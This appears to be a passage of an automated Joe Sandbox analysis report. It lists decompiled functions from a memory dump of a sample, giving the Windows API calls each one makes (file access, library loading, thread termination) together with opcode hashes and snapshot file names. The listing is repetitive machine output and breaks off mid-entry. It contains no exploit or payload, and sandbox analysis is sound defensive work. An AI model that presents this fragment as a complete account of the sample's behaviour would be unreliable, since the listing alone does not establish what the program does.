                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ChangeCloseErrorFindLastNotification
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1687624791-0
                                                                                                                                                                                                                                      • Opcode ID: 2c2eb5bc1cda0e3802f3add7bb978c7fa7b07cc0e34f0b8a3666be7dd2673c2c
                                                                                                                                                                                                                                      • Instruction ID: 527da431b8ab43877fec6712b679c990aaec5627c917b35d081e5171d7547c72
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c2eb5bc1cda0e3802f3add7bb978c7fa7b07cc0e34f0b8a3666be7dd2673c2c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A014E336051601ACE1627745A4677E67864BD373CF292219F91CBB2E3DE318C808293
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00E62BE1,?,00008000), ref: 00E65DB0
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00E62BE1,?,00008000), ref: 00EA496D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                                      • Opcode ID: 1ded0c012a45bbf0c3d051f7d30f93ad2e7dacf1b27ea951d70f0ba02b23dbad
                                                                                                                                                                                                                                      • Instruction ID: ce7ba149d39cd072ebdbfcf2e19887ab5aed34107f793ea6b560c5c4b97ef6c4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ded0c012a45bbf0c3d051f7d30f93ad2e7dacf1b27ea951d70f0ba02b23dbad
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0019231285226BAE3700A2ADC0EFD77F99EF467B4F108200BA987E1E0C7B45854CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,00EA4486,?,00000000,00000000,?,00E996BA,?,?,00000002,00000000), ref: 00E99644
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00E996BA,?,?,00000002,00000000,?,00E95DE1,?,00000000,00000000,00000002,?,?,?), ref: 00E9964E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2976181284-0
                                                                                                                                                                                                                                      • Opcode ID: c014ca00595ad3fecbc12da25eb96d413d5aedaafe73b432af2fc1b05801a25c
                                                                                                                                                                                                                                      • Instruction ID: 64017f91dd35a0a2c2b2d958024e8c5a6d06a543f7686bf06c2b527fed8d5a33
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c014ca00595ad3fecbc12da25eb96d413d5aedaafe73b432af2fc1b05801a25c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C01B9336105146FCF059F99DC058AE7B69DB85330B241249F815A7292E6719D41DBD0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(00000018,00000FA0,?,00000000,?,00EA298E,00000000), ref: 00ED08F7
                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(00000038,00000000), ref: 00ED0919
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CountCriticalExchangeInitializeInterlockedSectionSpin
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4104817828-0
                                                                                                                                                                                                                                      • Opcode ID: ae50e47f14d15f939ed0a1de7685ec2ebc7ab79578e014d54fed742b524c3e87
                                                                                                                                                                                                                                      • Instruction ID: 6a508a15f82ddda79ed0ae2027951ca3d9892cb62fe5c9ac52333c1f9183eb38
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae50e47f14d15f939ed0a1de7685ec2ebc7ab79578e014d54fed742b524c3e87
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2F012B15017059FC3209F1AD9449A7FBECFF94B20B40882EE59687A20CBB4B085CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RtlFreeHeap.FWRHGLUIBB(00000000,00000000,?,00E9DA52,?,00000000,?,00000000,?,00E9DA79,?,00000007,?,?,00E9DE76,?), ref: 00E92C5E
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,00E9DA52,?,00000000,?,00000000,?,00E9DA79,?,00000007,?,?,00E9DE76,?,?), ref: 00E92C70
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 485612231-0
                                                                                                                                                                                                                                      • Opcode ID: f6cb53a9b68fc3df7df3a7cd45cfc03c8fed8dd72ae7d73c477c6047ef9210e6
                                                                                                                                                                                                                                      • Instruction ID: 432d1b7a2b0d988789b4f37752630d7380f1c61f984d03d4038d258f55fccf23
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f6cb53a9b68fc3df7df3a7cd45cfc03c8fed8dd72ae7d73c477c6047ef9210e6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2E08C32105204ABDF203FB5AD09BA97FA9AB40365F148029F64CB6061DA349880D788
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00ED111D: InterlockedExchange.KERNEL32(016FA3C0,016FA3C0), ref: 00ED112D
                                                                                                                                                                                                                                        • Part of subcall function 00ED111D: EnterCriticalSection.KERNEL32(016FA3A0,00000000), ref: 00ED113F
                                                                                                                                                                                                                                        • Part of subcall function 00ED111D: TerminateThread.KERNEL32(?,000001F6), ref: 00ED114D
                                                                                                                                                                                                                                        • Part of subcall function 00ED111D: WaitForSingleObject.KERNEL32(?,000003E8), ref: 00ED115B
                                                                                                                                                                                                                                        • Part of subcall function 00ED111D: CloseHandle.KERNEL32(?), ref: 00ED116A
                                                                                                                                                                                                                                        • Part of subcall function 00ED111D: InterlockedExchange.KERNEL32(016FA3C0,000001F6), ref: 00ED117A
                                                                                                                                                                                                                                        • Part of subcall function 00ED111D: LeaveCriticalSection.KERNEL32(016FA3A0), ref: 00ED1181
                                                                                                                                                                                                                                      • FindCloseChangeNotification.KERNEL32(?,?,00ED09CA), ref: 00ED0968
                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?,?,00ED09CA), ref: 00ED098E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalSection$CloseExchangeInterlocked$ChangeDeleteEnterFindHandleLeaveNotificationObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 744473657-0
                                                                                                                                                                                                                                      • Opcode ID: c0e32ac135484207c07dc0b1794d823ef70f614dcf5c0d2dfc5ba87a954fd8dd
                                                                                                                                                                                                                                      • Instruction ID: 3c454ec4be4f61b7b6412888ba1324f1fa833b1980e3c70d61902209379abc1d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c0e32ac135484207c07dc0b1794d823ef70f614dcf5c0d2dfc5ba87a954fd8dd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6E0ED320156019BDB346F21E805A95BBE5BF44312F24581EF19A65971CB7154C9DF00
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,00000001,?,?,?,00E69DB5,?,?,?), ref: 00E676BA
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,00E69DB5,?,?,?), ref: 00E676F0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 626452242-0
                                                                                                                                                                                                                                      • Opcode ID: b577027b542f6cd20b131f15771bbf947ceb349c7d18ed5c7bd26677417f895b
                                                                                                                                                                                                                                      • Instruction ID: 2e40b71d4c0809045633f2086b24192a7ea89e46566701e70e52bdd15318907b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b577027b542f6cd20b131f15771bbf947ceb349c7d18ed5c7bd26677417f895b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E6018F713452047FEB19AB69AC4BF7F7AEEDB85790F14007EF106EA191E9A0AD009660
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 80cc2da97857e642f888466f19140226fb7eef97c98b6bdfa6f1dfee5879d9f5
                                                                                                                                                                                                                                      • Instruction ID: d4e52a8d954cc080905123047eb03c7af47e157277b5cd7550455fc541c38750
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80cc2da97857e642f888466f19140226fb7eef97c98b6bdfa6f1dfee5879d9f5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1CE1E171D401199BCF14DFA8E840AEEB7B5FF48390F58A03AE816BB291DB349941CF56
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(00E6A6A5,55B7840F,55B78410,00000000,00000001,?,00E6A6A5,?,00000001,?,?,?,00000000), ref: 00E66B50
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BuffCharUpper
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3964851224-0
                                                                                                                                                                                                                                      • Opcode ID: 2e5b486b336659b896fdb831c9729995e4524d2b38d8a3369c9d9f0bd4427392
                                                                                                                                                                                                                                      • Instruction ID: 7a57b038d3ae69ec21b465359d0c6441d86854eed5c6662d04faa65c9f1ba04f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e5b486b336659b896fdb831c9729995e4524d2b38d8a3369c9d9f0bd4427392
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB414835650602DFCF14DF24E444AB977A1FF44394B24A12AE82AFB2A1DB31AC60CF41
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 00ECFAD9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BuffCharLower
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2358735015-0
                                                                                                                                                                                                                                      • Opcode ID: 18007cf06073ffd6330ae88be61f474e8f2982078ddec8c1cb1cca532d78ed61
                                                                                                                                                                                                                                      • Instruction ID: 822f2e077fef500f5e94b6ac4509f7ad46280ed8bcff32fc567a818115bdbb6c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18007cf06073ffd6330ae88be61f474e8f2982078ddec8c1cb1cca532d78ed61
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9641C0B2600209AFCB11EF64C950EAEB7F9EF44354B20953EE916EB251EB71DE05CB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E652B6: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E65303,?,?,00E6502E,?,00000001,?,?,00000000), ref: 00E652C2
                                                                                                                                                                                                                                        • Part of subcall function 00E652B6: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E652D4
                                                                                                                                                                                                                                        • Part of subcall function 00E652B6: FreeLibrary.KERNEL32(00000000,?,?,00E65303,?,?,00E6502E,?,00000001,?,?,00000000), ref: 00E652E6
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00E6502E,?,00000001,?,?,00000000), ref: 00E65323
                                                                                                                                                                                                                                        • Part of subcall function 00E6527F: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00EA448E,?,?,00E6502E,?,00000001,?,?,00000000), ref: 00E65288
                                                                                                                                                                                                                                        • Part of subcall function 00E6527F: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E6529A
                                                                                                                                                                                                                                        • Part of subcall function 00E6527F: FreeLibrary.KERNEL32(00000000,?,?,00EA448E,?,?,00E6502E,?,00000001,?,?,00000000), ref: 00E652AD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2632591731-0
                                                                                                                                                                                                                                      • Opcode ID: 024136532ebee32cd55938d56cd644dc78f5bbdab3d939e435f45a3f365be240
                                                                                                                                                                                                                                      • Instruction ID: 57b2310cd3ce170d6469e92aebe35abe97e394df2f0b11c19d6b05a983fa7474
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 024136532ebee32cd55938d56cd644dc78f5bbdab3d939e435f45a3f365be240
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA11C473780605AADB24FB20DC02BAD77E59F54B90F10942DF553B62D2DEB09A059750
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,00010000,00000000,00000000,?,?,00000000,?,00E65A98,?,00010000,00000000,00000000,00000000,00000000), ref: 00E6A00C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                                                                      • Opcode ID: 8f5cbf775a03b2ebd778eebb1c322b4f0df5462854f536c6a9fd3053b1fc3772
                                                                                                                                                                                                                                      • Instruction ID: 5546c6a5a0ec4845d85cf6e251713489e53c42e086994dd5754933290433cff2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f5cbf775a03b2ebd778eebb1c322b4f0df5462854f536c6a9fd3053b1fc3772
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 47114C312447059FDB20CF15E880B76B7E9EF443A4F15D42DE5AA9BA52C770B849CB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E6237C,00F32418,?,?,?,?,?,?,?,00E62282,?), ref: 00E632D8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FullNamePath
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 608056474-0
                                                                                                                                                                                                                                      • Opcode ID: 775878d40c5a69ac7684572c1beb6e5bcfa7d02585eb51be47d0f72ff0c9a193
                                                                                                                                                                                                                                      • Instruction ID: 81e728bf0cf5602035cacb95a00f9d0bfc91bf242aab0e1cc96bd7f42f85c173
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 775878d40c5a69ac7684572c1beb6e5bcfa7d02585eb51be47d0f72ff0c9a193
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B611A570984208ABCB44FB74ED45DDDB7E9AF18394F005066B999F7352DE70D7849710
                                                                                                                                                                                                                                      Uniqueness

